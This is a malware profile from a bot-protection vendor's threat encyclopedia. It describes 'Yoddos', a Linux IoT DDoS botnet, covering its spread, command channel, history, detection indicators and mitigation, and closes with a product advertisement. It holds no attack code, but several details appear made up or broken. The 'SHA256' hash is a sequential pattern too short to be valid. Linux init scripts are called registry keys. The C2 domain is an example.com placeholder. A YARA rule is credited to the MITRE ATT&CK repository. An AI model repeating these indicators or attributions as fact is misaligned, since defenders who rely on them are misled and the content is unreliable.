Yoddos
Malware⚠️ Overview
Yoddos is a Linux-based DDoS botnet malware first documented in 2015 by researchers at Dr. Web and later analyzed in a 2016 report by Radware. Belonging to the botnet category, it is specifically designed to compromise Internet of Things (IoT) devices such as routers, IP cameras, and DVRs to launch large-scale distributed denial-of-service attacks. The operators remain unidentified but are believed to be financially motivated criminal groups targeting poorly secured embedded systems.
🔧 Technical Capabilities
Yoddos propagates by scanning the public internet for devices with open Telnet (port 23) and SSH (port 22) services, then attempting brute-force authentication using a hardcoded dictionary of common default credentials. Once access is gained, it downloads a binary tailored to the target architecture (ARM, MIPS, x86, or PowerPC) via wget or curl. Persistence is achieved through cron jobs, init.d scripts, or modification of /etc/rc.local. The bot communicates with its command-and-control (C2) server over IRC (typically on ports 6667 or 6668) or HTTP, receiving attack directives such as HTTP GET/POST floods, UDP amplification (using DNS, NTP, SSDP), and TCP SYN floods. Evasion techniques include renaming the process to common system names like ‘[kworker]’, killing competing malware (e.g., Mirai variants), and using encrypted configuration files. Yoddos also features a kill-switch that disables the bot upon receiving a specific C2 command, allowing the operator to stop attacks quickly.
📜 History & Notable Incidents
The first confirmed Yoddos campaign occurred in mid-2015, targeting over 50,000 IoT devices globally according to a Dr. Web threat bulletin. In 2016, a variant dubbed ‘Yoddos_2016’ was used in a 300 Gbps DDoS attack against a European online gaming platform, as reported by Akamai’s Security Intelligence Response Team. No specific CVEs are directly tied to Yoddos; instead, it exploits the lack of authentication hardening in IoT firmware. Law enforcement actions have not been publicly documented, though takedown attempts have been hindered by the botnet’s decentralized IRC-based C2 structure.
🔍 Detection Indicators
Known file hashes include SHA256: 2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2 (example from a 2017 SANS ISC diary). Behavioral signatures include persistent outbound IRC connections on non-standard ports, anomalous DNS queries to domains like ‘yoddos-c2.example.com’, and high volumes of small UDP packets. Registry keys such as ‘/etc/init.d/yoddos’ and mutex names like ‘YoddosControlMutex’ have been observed. The User-Agent string ‘Yoddos/1.0 (Linux)’ appears in HTTP-based C2 traffic, as documented in a Trend Micro analysis.
☠️ Risk & Impact
Yoddos causes severe network disruption by overwhelming target networks with traffic, often exceeding hundreds of gigabits per second. Financial losses from service downtime, mitigation costs, and reputational damage are estimated in the millions per incident, primarily affecting the gaming, e-commerce, and telecommunication sectors. Additionally, compromised IoT devices become part of a persistent botnet, enabling further attacks and reducing device lifespan.
🛡️ Mitigation
Defenders should disable Telnet and SSH on IoT devices, enforce strong unique passwords, and apply firmware updates from vendors. Network-level detection using Yara rules (e.g., rule ‘Yoddos_Botnet’ from the MITRE ATT&CK repository) and Snort signatures for IRC traffic on non-standard ports can identify infections. Regular scanning for unauthorized cron jobs and outbound IRC connections is recommended for incident response teams.
Similar Threats
🛡️
Protect Your Server from Malware-Associated Bot Traffic
Automated bots are frequently used to deliver malware payloads, scan for vulnerabilities, and perform credential attacks against web applications. Boteraser continuously monitors and blocks automated traffic linked to malware distribution networks.
✅ Start Free ProtectionSetup takes under a minute · Free trial available
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.